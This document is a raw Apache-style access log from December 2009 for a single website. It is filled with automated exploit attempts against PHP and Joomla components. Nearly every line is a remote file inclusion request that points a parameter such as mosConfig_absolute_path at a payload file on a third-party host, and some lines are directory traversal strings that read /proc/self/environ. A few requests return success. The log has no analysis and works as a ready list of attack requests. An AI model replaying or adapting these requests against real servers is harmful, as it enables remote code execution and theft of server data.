209.92.156.53 - - [13/Dec/2009:12:20:56 -0800] "GET /logs/access_080715.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:20:56 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:20:56 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:00 -0800] "GET /logs//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:00 -0800] "GET /logs/access_090322.log//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:00 -0800] "GET /main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:00 -0800] "GET /logs//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:01 -0800] "GET /main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:01 -0800] "GET /logs/access_090322.log//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:15 -0800] "GET /logs/access_080524.log//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:21:20 -0800] "GET /logs/access_080524.log//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:21:21 -0800] "GET /logs/access_080515.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:21:21 -0800] "GET /logs/access_080521.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:21:33 -0800] "GET /logs/access_080601.log%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:22:09 -0800] "GET /logs/access_090322.log%20%20//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:22:11 -0800] "GET /logs/access_090506.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:22:11 -0800] "GET /logs/access_090504.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:22:12 -0800] "GET /logs/access_090322.log%20%20//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:22:29 -0800] "GET /logs/access_090930.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:22:29 -0800] "GET /logs/access_090508.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:22:34 -0800] "GET /logs/access_080524.log%20%20//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:12:22:36 -0800] "GET /logs/access_080416.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:22:38 -0800] "GET /logs/access_080524.log%20%20//main.php?sayfa=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:12:22:45 -0800] "GET /logs/access_080212.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:22:49 -0800] "GET /logs/access_091120.log//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:22:49 -0800] "GET /appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:22:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:22:54 -0800] "GET /appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:22:54 -0800] "GET /logs/access_091120.log//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:22:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.21.74 - - [13/Dec/2009:12:22:57 -0800] "GET /logs/access.log HTTP/1.0" 200 404841 "-" "-" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:26 -0800] "GET /logs/access_081112.log//index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:26 -0800] "GET /logs/access_081112.log//index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:27 -0800] "GET /logs/access_081112.log//index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:27 -0800] "GET /index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 200 14801 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:27 -0800] "GET /logs/access_081112.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:30 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 14890 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:31 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 14887 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:23:32 -0800] "GET /errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:23:36 -0800] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:23:40 -0800] "GET /administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:23:40 -0800] "GET /logs/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:23:40 -0800] "GET /logs/access_090604.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:12:23:48 -0800] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:23:52 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:23:52 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:23:52 -0800] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:23:56 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:23:56 -0800] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:23:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:24:05 -0800] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:24:10 -0800] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:11 -0800] "GET /logs/access_090712.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:24:18 -0800] "GET /logs/access_080601.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:21 -0800] "GET /administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:21 -0800] "GET /logs/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:21 -0800] "GET /logs/access_090604.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:27 -0800] "GET /logs/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:27 -0800] "GET /logs/access_090604.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:27 -0800] "GET /administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:47 -0800] "GET /logs/access_090712.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:24:58 -0800] "GET /logs/access_090712.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:25:31 -0800] "GET /logs/access_090326.log//index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:25:32 -0800] "GET /logs/access_090326.log//index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:25:32 -0800] "GET /logs/access_090326.log//index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
77.221.130.17 - - [13/Dec/2009:12:25:32 -0800] "GET /logs/access_090326.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:26:47 -0800] "GET /logs/%C0%80%20/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:26:47 -0800] "GET /%C0%80%20/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:26:47 -0800] "GET /logs/access_090219.log%20%20/%C0%80%20/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:26:53 -0800] "GET /logs/access_090608.log%20%20/%C0%80%20/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:03 -0800] "GET /admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:03 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:07 -0800] "GET /logs/access_090527.log%20%20//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:10 -0800] "GET /admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:10 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:10 -0800] "GET /logs/access_090527.log%20%20//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:14 -0800] "GET /admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:14 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:14 -0800] "GET /logs/access_090527.log%20%20//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:18 -0800] "GET /logs/access_091105.log%20%20//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:21 -0800] "GET /logs/access_091105.log%20%20//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:27:23 -0800] "GET /logs/access_091105.log%20%20//admin/auth.php?xcart_dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:27:28 -0800] "GET /logs/access_080113.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:27:28 -0800] "GET /logs/access_080303.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:27:39 -0800] "GET /logs/access_080113.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:27:41 -0800] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:27:41 -0800] "GET /logs/access_080222.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:27:42 -0800] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14878 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:27:45 -0800] "GET /logs/access_090711.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:27:56 -0800] "GET /logs/access_080303.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:29:46 -0800] "GET /logs/access_080222.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:29:46 -0800] "GET /logs/access_090711.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:30:07 -0800] "GET /logs/access_090820.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:30:07 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:30:08 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:30:10 -0800] "GET /logs/access_090808.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:30 -0800] "GET /errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:30 -0800] "GET /logs/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:30 -0800] "GET /logs/access_081002.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:41 -0800] "GET /errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:41 -0800] "GET /logs/access_081002.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:41 -0800] "GET /logs/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:31:55 -0800] "GET /logs/access_080828.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:32:07 -0800] "GET /logs/access_080828.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:32:08 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:32:53 -0800] "GET /errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:32:54 -0800] "GET /logs/access_081002.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:32:54 -0800] "GET /logs/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:33:14 -0800] "GET /logs/access_080828.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:33:45 -0800] "GET /administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
